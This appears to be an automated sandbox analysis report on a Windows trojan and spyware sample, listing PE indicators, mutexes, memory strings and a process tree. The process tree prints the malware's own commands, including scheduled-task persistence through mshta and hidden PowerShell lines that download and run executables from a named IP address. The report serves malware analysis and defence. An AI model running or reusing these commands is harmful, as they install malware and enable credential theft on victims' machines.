Source: 13426522e9.exe.11.dr	Static PE information: Section: ZLIB complexity 0.9967130335365854
Source: 13426522e9.exe.11.dr	Static PE information: Section: stywrpjp ZLIB complexity 0.9949050641538237

Source: ede25bd9a2.exe.11.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[2].exe0.11.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[2].exe1.11.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 298e6cea90.exe.11.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: random[2].exe.11.dr, s1l70P8mWLYDmBOs6L.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 095fb861eb.exe.11.dr, s1l70P8mWLYDmBOs6L.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1AWhJsY[1].exe.11.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1AWhJsY.exe.11.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'

Source: random[2].exe.11.dr, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
Source: 095fb861eb.exe.11.dr, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
Source: 1AWhJsY[1].exe.11.dr, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
Source: 1AWhJsY.exe.11.dr, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@171/131@24/12

Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe

Code function: 2_2_6C490300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

2_2_6C490300

Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SQ545SK2.htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5348:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5432:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6292:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2828:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2116:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2676:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7104:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2540:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2252:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:940:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8156:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3084:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7988:120:WilError_03

Source: C:\Users\user\Desktop\random.exe

File created: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe

Jump to behavior

Source: C:\Windows\SysWOW64\tasklist.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\random.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2196109189.000000006C5BF000.00000002.00000001.01000000.0000000E.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2195792041.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2190370013.0000000005A60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2196109189.000000006C5BF000.00000002.00000001.01000000.0000000E.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2195792041.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2190370013.0000000005A60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2196109189.000000006C5BF000.00000002.00000001.01000000.0000000E.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2195792041.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2190370013.0000000005A60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2196109189.000000006C5BF000.00000002.00000001.01000000.0000000E.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2195792041.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2190370013.0000000005A60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: 4CAJNBDWED5ZLJ2B.exe, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2196109189.000000006C5BF000.00000002.00000001.01000000.0000000E.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2195792041.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2190370013.0000000005A60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2196109189.000000006C5BF000.00000002.00000001.01000000.0000000E.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2195792041.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2190370013.0000000005A60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2195792041.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2190370013.0000000005A60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: random.exe, 00000000.00000003.1701242506.0000000006105000.00000004.00000800.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000003.2052325008.0000000005929000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2195792041.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2190370013.0000000005A60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2195792041.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2190370013.0000000005A60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: random.exe	Virustotal: Detection: 59%
Source: random.exe	ReversingLabs: Detection: 60%

Source: 4CAJNBDWED5ZLJ2B.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\random.exe

File read: C:\Users\user\Desktop\random.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe "C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe"
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe "C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe"
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 --field-trial-handle=2188,i,471670975520233966,4041854112257341000,262144 /prefetch:8
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe "C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe"
Source: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn 8unbAmadbNN /tr "mshta C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn 8unbAmadbNN /tr "mshta C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1071504021\am_no.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1071504021\am_no.cmd" any_word
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE "C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE "C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "3d1I8ma3ZrJ" /tr "mshta \"C:\Temp\akcRBGtSi.hta\"" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\akcRBGtSi.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE "C:\Temp\akcRBGtSi.hta"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe "C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe"
Source: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn 4EyhLma4lxg /tr "mshta C:\Users\user\AppData\Local\Temp\ID499IQcV.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\ID499IQcV.hta
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn 4EyhLma4lxg /tr "mshta C:\Users\user\AppData\Local\Temp\ID499IQcV.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\ID499IQcV.hta
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1071538001\f2d6093d56.exe "C:\Users\user\AppData\Local\Temp\1071538001\f2d6093d56.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE "C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE "C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE"
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1071504021\am_no.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1071504021\am_no.cmd" any_word
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1071539001\b33114b970.exe "C:\Users\user\AppData\Local\Temp\1071539001\b33114b970.exe"
Source: C:\Users\user\AppData\Local\Temp\1071539001\b33114b970.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "In6qPmaKHFs" /tr "mshta \"C:\Temp\sJKQarzEf.hta\"" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "C:\Temp\sJKQarzEf.hta"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe "C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe"
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE "C:\Temp\sJKQarzEf.hta"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe "C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe"
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	Process created: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe "C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn QiaKqmadtXf /tr "mshta C:\Users\user\AppData\Local\Temp\xsqWpWDz2.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\xsqWpWDz2.hta
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn QiaKqmadtXf /tr "mshta C:\Users\user\AppData\Local\Temp\xsqWpWDz2.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe "C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe"	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe "C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
